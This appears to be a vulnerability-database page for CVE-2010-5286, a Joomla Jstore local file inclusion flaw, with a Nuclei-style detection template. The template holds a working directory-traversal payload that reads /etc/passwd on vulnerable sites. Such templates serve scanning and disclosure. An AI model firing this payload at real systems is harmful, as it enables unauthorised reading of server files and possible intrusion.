CVE-2010-5286: Joomla! Component Jstore - 'Controller' Local File Inclusion

2025-08-01 Joomla Component Jstore PoC Public

Description

A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.

PoC

id: CVE-2010-5286

info:
  name: Joomla! Component Jstore - 'Controller' Local File Inclusion
  author: daffainfo
  severity: critical
  description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Arbitrary file inclusion leading to remote code execution
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/34837
    - https://nvd.nist.gov/vuln/detail/CVE-2010-5286
    - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
    cvss-score: 10
    cve-id: CVE-2010-5286
    cwe-id: CWE-22
    epss-score: 0.11382
    epss-percentile: 0.95769
    cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joobi
    product: com_jstore
  tags: cve2010,cve,joomla,lfi,edb,packetstorm,joobi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b9fcf422752c6fdbd60b8fc5b0a4ed26431fec8803b0b2db6f2ce2cb7af18c4b02210084a31c2937618e7e140033fd59158b0f4710abae0e8ec6990534767f2d97bf5c:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities